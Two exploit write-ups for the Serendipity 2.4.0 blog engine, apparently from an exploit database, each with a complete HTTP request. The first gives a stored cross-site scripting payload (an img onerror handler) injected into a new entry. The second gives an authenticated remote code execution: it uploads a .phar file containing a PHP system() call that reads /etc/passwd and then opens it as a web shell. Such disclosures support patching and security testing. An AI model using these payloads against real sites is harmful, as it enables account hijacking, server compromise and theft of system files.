<pre><code>Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)<br />Author: Mirabbas Ağalarov<br />Application: Serendipity<br />Version: 2.4.0<br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://docs.s9y.org/<br />Software Link: https://docs.s9y.org/downloads.html<br />Date of found: 13.04.2023<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1.Anyone who has the authority to create the new entry can do this<br />payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E<br /><br /><br />POST /serendipity/serendipity_admin.php? HTTP/1.1<br />Host: localhost<br />Content-Length: 730<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; 
s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b<br />Connection: close<br /><br />serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1<br /><br /><br /><br />2. visit the entry you created<br /><br /></code></pre>
<pre><code>Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)<br />Application: Serendipity <br />Version: 2.4.0 <br />Bugs: Remote Code Execution (RCE) (Authenticated) via file upload<br />Technology: PHP<br />Vendor URL: https://docs.s9y.org/<br />Software Link: https://docs.s9y.org/downloads.html<br />Date of found: 13.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />If we load the poc.phar file in the image field while creating a category, we can run commands on the system.<br /><?php echo system("cat /etc/passwd"); ?><br /> I wrote a file with the above payload, a poc.phar extension, and uploaded it.<br /><br />Visit to http://localhost/serendipity/uploads/poc.phar<br /><br />poc request:<br /><br /><br />POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1<br />Host: localhost<br />Content-Length: 1561<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: 
iframe<br />Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; 
s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b<br />Connection: close<br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[token]"<br /><br />ae9b8ae35a756c24f9552a021ee81d56<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[action]"<br /><br />admin<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[adminModule]"<br /><br />media<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[adminAction]"<br /><br />add<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system("cat /etc/passwd");?><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_filename][1]"<br /><br />poc.phar<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_directory][1]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[column_count][1]"<br /><br />true<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[imageurl]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[imageimporttype]"<br /><br />image<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_filename][]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_directory][]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc--<br /><br /><br />poc video : https://youtu.be/_VrrKOTywgo<br /><br /></code></pre>